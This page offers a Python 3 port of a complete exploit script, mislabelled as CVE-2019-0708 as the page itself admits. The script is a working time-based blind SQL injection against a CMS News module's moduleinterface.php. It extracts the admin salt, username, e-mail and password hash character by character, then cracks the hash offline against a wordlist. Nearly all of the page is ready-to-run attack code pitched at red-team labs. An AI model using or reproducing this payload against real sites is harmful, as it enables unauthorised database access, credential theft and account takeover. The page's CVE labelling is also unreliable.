Exploits Python cve-2019-0708 – by HackHeart 🧠 Code Review & Porting - Python 2 → Python 3. Note: the label on this page does not match the code below. CVE-2019-0708 is the Windows RDP ("BlueKeep") vulnerability, but nothing in this script touches RDP; what is listed is a time-based blind SQL injection (MySQL `SLEEP()` as the oracle) against a CMS `moduleinterface.php` News module, which dumps the admin salt, username, e-mail and password hash from the `cms_siteprefs` / `cms_users` tables and optionally cracks the hash offline. Confirm the correct advisory before filing, tagging or relying on this as a CVE-2019-0708 exploit. This exploit was originally written in Python 2, which is no longer supported by modern systems. To keep the tooling usable going forward, the codebase has been reviewed and migrated to Python 3.
🔧 Key improvements during the port:
Updated print statements to Python 3 syntax
Replaced raw_input() with input()
Adapted I/O to handle bytes/str properly (note: this script uses `requests` rather than raw sockets, and the listing below contains no `.decode()` calls, so this item describes the port in general rather than anything visible in this file)
Removed deprecated methods like xrange() and .iteritems()
Validated script compatibility with Python 3.8+ and modern Linux distros
🛡️ This version maintains the exploit logic intact while ensuring:
Compatibility with modern OSCP / Red Team labs
Cleaner and more readable syntax (the port does not harden the exploit itself: the time-based oracle still depends on `TIME` being larger than the target's normal response jitter, and the `LIKE`-based comparison is case-insensitive, so tune `TIME` for the target and sanity-check the dumped values rather than trusting them blindly)
Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)
#!/usr/bin/env python3
import requests import time import argparse import hashlib
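parser = argparse.ArgumentParser(
    description=(
        "Time-based blind SQL injection against a CMS News module: dumps the "
        "admin user's salt, username, e-mail and password hash and can crack "
        "the hash offline against a wordlist."
    )
)
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()
# -c without -w was previously ignored silently; the user would sit through a
# full (slow) dump and only then discover nothing was cracked. Fail up front.
if args.crack and not args.wordlist:
    parser.error("--crack requires --wordlist")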
# Injection point: the News module's m1_idlist parameter of moduleinterface.php.
url_vuln = f"{args.url.rstrip('/')}/moduleinterface.php?mact=News,m1_,default,0"
# A single session so the connection is reused across the many probe requests.
session = requests.Session()
# Candidate alphabet, tried in this order for every character position.
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
# Seconds the injected SLEEP() delays a true answer; also the detection threshold.
TIME = 1
# Loop control shared with dump_field(); must be True before each dump call.
flag = True
# Values recovered from the target, filled in as each dump completes.
salt, username, email, password_hash = '', '', '', ''
# Human-readable summary printed at the end.
output = ""
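def dump_field(field_name, table, column, condition):
    """Dump one column value, character by character, via time-based blind SQLi.

    Each probe injects ``(SELECT SLEEP(TIME) FROM table WHERE column LIKE
    0x<hex-prefix>% AND condition)`` into the ``m1_idlist`` parameter of
    ``url_vuln``; a response that takes at least ``TIME`` seconds means the
    guessed prefix is correct. Extraction stops at the first position where
    no character of ``dictionary`` matches.

    Args:
        field_name: Label for the value being dumped; used only in messages.
        table: Table to read from (interpolated into the payload as-is).
        column: Column whose value is dumped.
        condition: Extra ``WHERE`` clause selecting the target row.

    Returns:
        The recovered string (empty if the very first character never matched).

    Raises:
        SystemExit: if a probe request fails or times out; a probe that cannot
            be scored would otherwise be misread as a hit and produce garbage.

    Module state: reads ``session``, ``url_vuln``, ``dictionary`` and ``TIME``;
    requires the global ``flag`` to be True on entry (callers reset it) and
    leaves it False on return.

    Caveats inherent to the oracle (left unchanged here):
      * MySQL ``LIKE`` is case-insensitive under the default collations, so
        the uppercase half of ``dictionary`` is effectively redundant and
        mixed-case values come back in whichever case matched first.
      * ``_`` in ``dictionary`` is a single-character LIKE wildcard and ``%``
        (0x25) is appended as the prefix wildcard, so ``_`` can match any byte
        not covered earlier in the alphabet.
      * Network latency above ``TIME`` seconds yields false positives; raise
        ``TIME`` on slow links.
    """
    global flag
    result = ""
    ord_result = ""
    # Bound each probe so a dead host cannot hang the script forever. The bound
    # sits well above TIME so a genuine SLEEP() never trips it.
    probe_timeout = TIME + 10
    while flag:
        flag = False
        for char in dictionary:
            temp_result = result + char
            # Hex-encode the prefix so the payload needs no quote characters.
            ord_temp_result = ord_result + format(ord(char), "x")
            print(f"[*] Trying {temp_result}")
            payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
            # monotonic() is immune to wall-clock adjustments during the probe.
            start_time = time.monotonic()
            try:
                session.get(url_vuln + "&m1_idlist=" + payload, timeout=probe_timeout)
            except requests.RequestException as exc:
                raise SystemExit(f"[!] Request failed while dumping {field_name}: {exc}") from exc
            if time.monotonic() - start_time >= TIME:
                result = temp_result
                ord_result = ord_temp_result
                flag = True
                break
    return result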
# One entry per value to dump: (dump_field label, progress label, summary
# label, table, column, row selector). The selectors are hex-encoded strings:
# 0x736974656d61736b is "sitemask", 0x31 is "1".
_targets = [
    ("salt", "salt", "Salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b"),
    ("username", "username", "Username", "cms_users", "username", "user_id+LIKE+0x31"),
    ("email", "email", "Email", "cms_users", "email", "user_id+LIKE+0x31"),
    ("password", "password hash", "Hash", "cms_users", "password", "user_id+LIKE+0x31"),
]
_dumped = {}
for _field, _progress, _label, _table, _column, _where in _targets:
    print(f"[+] Extracting {_progress}...")
    # dump_field's outer loop only runs while the shared flag is set.
    flag = True
    _dumped[_field] = dump_field(_field, _table, _column, _where)
    output += f"{_label}: {_dumped[_field]}\n"
salt = _dumped["salt"]
username = _dumped["username"]
email = _dumped["email"]
password_hash = _dumped["password"]
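# Offline crack. The script assumes the stored hash is md5(salt + password),
# so each candidate is re-hashed with the dumped salt and compared to the
# dumped hash.
if args.crack and args.wordlist:
    if not password_hash:
        # The dump returned nothing to compare against; cracking is pointless.
        print("[-] No password hash recovered; skipping cracking")
    else:
        print("[+] Cracking password...")
        cracked = None
        with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
            for line in f:
                word = line.strip()
                print(f"[*] Trying password: {word}")
                if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
                    cracked = word
                    break
        if cracked is None:
            # Previously an exhausted wordlist ended in silence; report it.
            output += "[-] Password not found in wordlist\n"
        else:
            output += f"[+] Password cracked: {cracked}\n"
elif args.crack:
    print("[-] --crack requires --wordlist; skipping cracking")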
# Final summary: a blank line, the banner, then the accumulated results.
print("\n=== Exploit Results ===", output, sep="\n")